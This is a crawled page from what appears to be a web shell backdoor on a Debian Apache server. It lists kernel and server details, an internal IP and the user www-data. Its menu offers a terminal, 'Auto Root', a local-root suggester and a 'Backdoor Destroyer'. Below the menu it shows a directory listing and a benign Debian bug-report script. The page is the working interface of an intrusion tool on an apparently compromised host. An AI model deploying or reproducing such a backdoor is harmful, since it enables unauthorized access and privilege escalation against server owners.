Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
bug /
linux-image-6.1.0-52-cloud-amd64 /
Delete
Unzip
Name
Size
Permission
Date
Action
control
430
B
-rw-r--r--
2025-12-16 14:01
include-0version
106
B
-rw-r--r--
2025-12-16 13:50
include-1cmdline
111
B
-rw-r--r--
2025-12-16 13:50
include-1tainted
1.45
KB
-rw-r--r--
2025-12-16 14:01
include-dmesg
688
B
-rw-r--r--
2025-12-16 13:50
include-model
1.36
KB
-rw-r--r--
2026-06-15 13:49
include-modules
330
B
-rw-r--r--
2025-12-16 13:50
include-network
1.58
KB
-rw-r--r--
2025-12-16 13:50
include-pci
257
B
-rw-r--r--
2025-12-16 13:50
include-pstore
1.46
KB
-rw-r--r--
2025-12-16 13:50
include-usb
251
B
-rw-r--r--
2025-12-16 13:50
info
149
B
-rw-r--r--
2026-08-03 18:40
presubj
447
B
-rw-r--r--
2025-12-16 13:50
script
1.01
KB
-rwxr-xr-x
2025-12-16 14:01
Save
Rename
add_dmesg() { local got_log= echo '** Kernel log:' >&3 if [ "$(cat /proc/sys/kernel/dmesg_restrict)" = 0 ]; then dmesg > >(tail -n 100 >&3) && got_log=y elif command -v sudo >/dev/null; then yesno "Use sudo to read the kernel log? " yep if [ "$REPLY" = yep ]; then sudo dmesg > >(tail -n 100 >&3) && got_log=y fi fi test "$got_log" || echo 'Unable to read kernel log; any relevant messages should be attached' >&3 echo >&3 } ask_dmesg() { # Remind the user to attach the kernel log. This should also trigger # a reminder in some MUAs if the user tries to send without it. echo '** Kernel log: boot messages should be attached' >&3 echo >&3 }